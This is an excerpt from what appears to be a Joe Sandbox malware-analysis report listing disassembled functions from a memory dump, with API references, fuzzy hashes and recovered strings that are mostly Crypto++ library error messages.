Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
Opcode ID: 7880218b1dbd8886d96a611625abfd84f2068251a47b664de27a80a135290108
Instruction ID: 9d624a7cbc0f598217d6d3c4c39b1ce74788a5315e81d2473169ff35727403e0
Opcode Fuzzy Hash: 7880218b1dbd8886d96a611625abfd84f2068251a47b664de27a80a135290108
Instruction Fuzzy Hash: 8E918C746093819FD704CF28C880B5BBBE9AFDA708F14891EF99887351D771E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C921200 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 6C93D820: _memmove.LIBCMT ref: 6C93D930

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C9213D4

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Part of subcall function 6C918D80: _malloc.LIBCMT ref: 6C918D8A
Part of subcall function 6C918D80: _malloc.LIBCMT ref: 6C918DAF

Strings

doesn't match the required length of , xrefs: 6C921316
for this key, xrefs: 6C921348
: ciphertext length of , xrefs: 6C9212E4

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: doesn't match the required length of $ for this key$: ciphertext length of
API String ID: 1025790555-2559040249
Opcode ID: 3fe7de4a0695864c1ccb8b8bfe2aa1d10d3c389f731dc5382c495f27650ae5f8
Instruction ID: 9d2bb5f4b6461d021075fdf77317f8f9e220b812eca9f2bff7441036f018e5e4
Opcode Fuzzy Hash: 3fe7de4a0695864c1ccb8b8bfe2aa1d10d3c389f731dc5382c495f27650ae5f8
Instruction Fuzzy Hash: D1A14D755083809FD324CB69C890BDBB7E9AFE9308F04491DE59D83790DB34E908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C94B47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6C94B50D

Part of subcall function 6C951AA0: __87except.LIBCMT ref: 6C951ADB

Strings

pow, xrefs: 6C94B4E5, 6C94B502

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: bedee182c1c0f1ee4280cfcbc898c954112f880f33cff76f64aa235afeff75ac
Instruction ID: 80237f6f14a65fa3c9faf014e7e9f890e5f25b1c62a38b209fe8c08b654c2213
Opcode Fuzzy Hash: bedee182c1c0f1ee4280cfcbc898c954112f880f33cff76f64aa235afeff75ac
Instruction Fuzzy Hash: 34514B31F0DA0186D701EE19C9503AE7BB8DB53718F70CD58E4E542EE8EB35C4E48A46

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F8560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6C8F88ED

Part of subcall function 6C94A116: __mbstowcs_s_l.LIBCMT ref: 6C94A12C

__cftoe.LIBCMT ref: 6C8F8911

Strings

zX, xrefs: 6C8F865E
P, xrefs: 6C8F8841

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: 23ca7bf61a99c4d976b740d76536ff614ed65d6bb0d746c804dc14b9a62c8c57
Instruction ID: 0884182bcc04a4083f51f80b0723431ae1acab8b9f5587499bcc6922bcc616a8
Opcode Fuzzy Hash: 23ca7bf61a99c4d976b740d76536ff614ed65d6bb0d746c804dc14b9a62c8c57
Instruction Fuzzy Hash: A09100B11087819FC376CF15C980BEBBBE8AB89714F504E2DE1994B680DB719645CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C9189D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C918ABB
__CxxThrowException@8.LIBCMT ref: 6C918B82

Strings

: invalid ciphertext, xrefs: 6C918B48
PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6C918A8E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: d5758f370cdcc7b7235688576a39220aa2e7384f8fd5c36ad6c83d851ce595fd
Instruction ID: 14d0de35e5a20eb24e8d585a5d958db58654bc11767cc21852c7d6f2564b171b
Opcode Fuzzy Hash: d5758f370cdcc7b7235688576a39220aa2e7384f8fd5c36ad6c83d851ce595fd
Instruction Fuzzy Hash: C4514CB51087409FD324CF64C990EABB7F8EBD9708F004A1DE59A97B50DB31E909CB66

Uniqueness

Uniqueness Score: -1.00%

Function 6C916B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C916BA6

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4067
Part of subcall function 6C8E4010: _memmove.LIBCMT ref: 6C8E40C8

__CxxThrowException@8.LIBCMT ref: 6C916C56

Strings

NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6C916B33
RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6C916BE3

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1902190269-184618050
Opcode ID: 8a6056d62cd48fbedaefb78f53995d1737e83567a4ae2204a7275c7a0b634f07
Instruction ID: f3039bc2139ecd791e017802e7650604b3967fc2dff7e1200fc4600bfe59c469
Opcode Fuzzy Hash: 8a6056d62cd48fbedaefb78f53995d1737e83567a4ae2204a7275c7a0b634f07
Instruction Fuzzy Hash: AB511571109380AFD300CF69C980A5BBBE8BBDA754F504E2EF1A593B90D774D908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E4E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8E4EFC
std::_Xinvalid_argument.LIBCPMT ref: 6C8E4F16
_memmove.LIBCMT ref: 6C8E4F6C

Part of subcall function 6C8E4D90: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4DA9
Part of subcall function 6C8E4D90: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4DCA
Part of subcall function 6C8E4D90: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4DE5
Part of subcall function 6C8E4D90: _memmove.LIBCMT ref: 6C8E4E4D

Strings

string too long, xrefs: 6C8E4EF7, 6C8E4F11

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: f6c78fe4be85f3950ab2d9adc2d3bbb21e61c3802a293c2009b149046ae34d88
Instruction ID: 2f5dafe9ada5f1f400d31949f139e892954a527b0fb01e7792d9214f42a710da
Opcode Fuzzy Hash: f6c78fe4be85f3950ab2d9adc2d3bbb21e61c3802a293c2009b149046ae34d88
Instruction Fuzzy Hash: CD31E9323106104BD7359EDCE58096AF7E9EFDAB247208D2FE55987E81C771D84487A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E2090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C8E211F

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4067
Part of subcall function 6C8E4010: _memmove.LIBCMT ref: 6C8E40C8

__CxxThrowException@8.LIBCMT ref: 6C8E21BF

Strings

PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6C8E215D
PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6C8E20BD

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 1902190269-1268710280
Opcode ID: 772acb5a46a3ecfb739e7ac28520a4634eecc2db3112a7614826fca1cfa49331
Instruction ID: d8f71bf067ca8ecf292c898df5886ab1600ff3f45a9dd5497065836514a4d4a5
Opcode Fuzzy Hash: 772acb5a46a3ecfb739e7ac28520a4634eecc2db3112a7614826fca1cfa49331
Instruction Fuzzy Hash: 00411C70C4528CEBDB10DFE9D890ADDFBB8AB1A314F10466AE421A7B91DB749608CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C8E1D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C8E1DC9

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E4067
Part of subcall function 6C8E4010: _memmove.LIBCMT ref: 6C8E40C8

__CxxThrowException@8.LIBCMT ref: 6C8E1E74

Strings

CryptoMaterial: this object contains invalid values, xrefs: 6C8E1E16
BufferedTransformation: this object is not attachable, xrefs: 6C8E1D67

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 1902190269-3853263434
Opcode ID: f5c6b1e08d29bf493ee71a8364c963696a4022257bdd06a990b65f637312ee18
Instruction ID: 1a1a41981d8d09eb57fabcf7ae14eb666d52d324a5cb02a33e65885f1deedd31
Opcode Fuzzy Hash: f5c6b1e08d29bf493ee71a8364c963696a4022257bdd06a990b65f637312ee18
Instruction Fuzzy Hash: 5C413D71C05288AFDB10CFE9D890BDDFBB8FB59314F10866AE42567B91DB349608CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C9174C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6C93D820: _memmove.LIBCMT ref: 6C93D930

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C91761A

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

byte digest to , xrefs: 6C917565
bytes, xrefs: 6C917594
HashTransformation: can't truncate a , xrefs: 6C917552

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 39012651-1139078987
Opcode ID: fbe1abc00742d886b16bf1d242f1729e93ae72618604999a526252d7dfab8ea8
Instruction ID: e2164d53dd6d9bf01506467bfee6db3064024abbd5a857c7975a96529d5d1b9a
Opcode Fuzzy Hash: fbe1abc00742d886b16bf1d242f1729e93ae72618604999a526252d7dfab8ea8
Instruction Fuzzy Hash: 884160711083C09AD330CB59C955FDBBBE8ABE9314F104E2DE59997B80DB7491088BA6

Uniqueness

Uniqueness Score: -1.00%

Function 6C91BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C91BF2D

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

Strings

gfff, xrefs: 6C91BF37
vector<T> too long, xrefs: 6C91BF28
gfff, xrefs: 6C91BF80

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: d78aad57a6e74ab8be65aa77ded38bbb3a0099c1c5b7566acf784bf976a45689
Instruction ID: 35eea3b79ebd7543f3b67a4226b67191648681e325249a7310167399a01e710e
Opcode Fuzzy Hash: d78aad57a6e74ab8be65aa77ded38bbb3a0099c1c5b7566acf784bf976a45689
Instruction Fuzzy Hash: 1331E5B1A042099FC718CF59C980E6AF7B9FB98310F10862DE9599BB80DB31F904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C948E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(65628154,65628154), ref: 6C948E7F
GetLastError.KERNEL32(0000000A), ref: 6C948E8F

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C948F14

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6C948EA5

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: f76f401348ee07abc7afbafba576d41a14fdae9b41c58d590da401860b7e009b
Instruction ID: 09a8cf524417f3e58f33d73d9fe6820dfcc157489ee2a50802045761d75266a6
Opcode Fuzzy Hash: f76f401348ee07abc7afbafba576d41a14fdae9b41c58d590da401860b7e009b
Instruction Fuzzy Hash: C7213DB150C3809FD310CF65C841B9BB7E8BB9A618F504E1EF5A993B81D735D5088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C948F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(65628154,65628154,?,00000000), ref: 6C948F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6C948F8F

Part of subcall function 6C8E4010: std::_Xinvalid_argument.LIBCPMT ref: 6C8E402A

__CxxThrowException@8.LIBCMT ref: 6C949014

Part of subcall function 6C94AC75: RaiseException.KERNEL32(?,?,6C949C34,65628154,?,?,?,?,6C949C34,65628154,6C979C90,6C98B974,65628154), ref: 6C94ACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6C948FA5

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 8a318bf8ccc923ddef6e0d9dba7b84c13e28096740463cf35b8044df6390ef61
Instruction ID: 453403b3a2c0cfe0541262bb677be5d11107fb84088239d9bf1bcf2c3fe6a01e
Opcode Fuzzy Hash: 8a318bf8ccc923ddef6e0d9dba7b84c13e28096740463cf35b8044df6390ef61
